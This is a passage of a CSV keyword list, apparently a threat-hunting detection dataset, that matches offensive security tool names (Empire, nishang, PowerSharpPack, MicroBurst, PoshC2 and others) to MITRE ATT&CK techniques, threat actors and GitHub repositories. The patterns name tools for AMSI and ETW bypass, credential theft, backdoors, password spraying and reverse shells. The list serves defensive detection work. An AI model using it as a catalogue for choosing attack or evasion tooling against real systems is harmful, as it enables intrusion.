functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Inveigh-Relay.ps1*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"*inveighzero.exe*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle 
tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"*InvisibilityCloak.py*","offensive_tool_keyword","InvisibilityCloak","Proof-of-concept obfuscation toolkit for C# post-exploitation tools","T1027 - T1059.003 - T1140 - T1107","TA0004 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/h4wkst3r/InvisibilityCloak","1","1","N/A","N/A","4","375","147","2022-07-22T14:13:53Z","2021-05-19T14:19:49Z" +"*Invisi-Shell*","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1059 - T1053 - T1027 - T1055 - T1562","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","N/A","10","921","143","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z" +"*invoke obfuscation*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - 
T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*invoke* -Action command -Execute * -Session*","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","0","N/A","10","10","9","0","2022-07-31T10:05:53Z","2022-01-16T21:02:14Z" +"*Invoke-*WDigestDowngrade.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*invoke_obfuscation.py*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. 
This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" +"*invoke_sessiongopher.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*Invoke-AccessCheckForAllGroups*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" +"*Invoke-AccessCheckForAllServicePrincipals*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" +"*Invoke-AccessCheckForAllUsers*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" +"*Invoke-AccessCheckForCurrentUser*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory 
environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" +"*Invoke-AccessCheckForCurrentUser*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" +"*Invoke-AccessCheckForGroup*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" +"*Invoke-AccessCheckForServicePrincipal*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" +"*Invoke-AccessCheckForUser*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" +"*Invoke-ACLcsvFileAnalysis*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - 
T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z"
+"*Invoke-ACLPwn*","offensive_tool_keyword","Invoke-ACLpwn","Invoke-ACLpwn is a tool that automates the discovery and pwnage of ACLs in Active Directory that are unsafe configured.","T1098 - T1208 - T1484 - T1486 - T1059","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/fox-it/Invoke-ACLPwn","1","0","N/A","N/A","5","498","86","2022-09-15T15:13:00Z","2018-04-26T09:21:27Z"
+"*Invoke-ACLScanner * -Filter *","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z"
+"*Invoke-ACLScanner * -Name *","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z"
+"*invoke-aclscanner*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
+"*Invoke-ACLScanner*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*Invoke-ADCSTemplateRecon*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*Invoke-ADSBackdoor*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z"
+"*Invoke-ADSBackdoor*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*Invoke-AirstrikeAttackCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
+"*Invoke-AllAccessChecks*","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","6","1","90","16","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z"
+"*Invoke-AllChecks*","offensive_tool_keyword","AD exploitation cheat sheet","Check for vulnerable programs and configs","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*Invoke-AmsiBypass*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
+"*Invoke-AmsiBypass*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*Invoke-APIConnectionHijack.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z"
+"*Invoke-ApplicationsOnStartupCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
+"*Invoke-ApplicationsOnStartupCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
+"*Invoke-ARPScan*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-ARPScan.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*invoke-arpscan*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
+"*Invoke-ARPScan.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1077","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-ASREPRoast*","offensive_tool_keyword","ASREPRoast","Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. 
","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","1","N/A","N/A","2","180","57","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z"
+"*InvokeAssembly.x64.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*Invoke-AutoKerberoast*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z"
+"*Invoke-AzElevatedAccessToggle*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z"
+"*Invoke-AzRESTBastionShareableLink*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z"
+"*Invoke-AzureEnum.ps1*","offensive_tool_keyword","Invoke-AzureEnum","This cmdlet is used to perform users enumeration against Azure","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation 
tools","https://github.com/tobor88/PowerShell-Red-Team/blob/master/Invoke-AzureEnum.ps1","1","1","N/A","N/A","5","417","85","2023-04-05T22:03:19Z","2019-11-20T22:07:50Z"
+"*Invoke-AzurePasswordSpray*","offensive_tool_keyword","Invoke-AzurePasswordSpray","This cmdlet is used to perform a password spray attack against Azure accounts using legacy Basic Authentication","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/tobor88/PowerShell-Red-Team/blob/master/Invoke-AzurePasswordSpray.ps1","1","1","N/A","N/A","5","417","85","2023-04-05T22:03:19Z","2019-11-20T22:07:50Z"
+"*Invoke-AzureRmVMBulkCMD.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z"
+"*Invoke-AzVMBulkCMD.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z"
+"*Invoke-BackdoorLNK*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BackdoorLNK.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-BackdoorLNK*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1115","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-BadPotato*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-BadZure*","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation 
Tools","https://github.com/mvelazc0/BadZure/","1","1","N/A","5","4","302","18","2023-07-27T15:40:41Z","2023-05-05T04:52:21Z"
+"*Invoke-BetterSafetyKatz*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*Invoke-Binary *.exe*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. 
It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z"
+"*Invoke-BitlockerCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
+"*Invoke-BlockETW*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
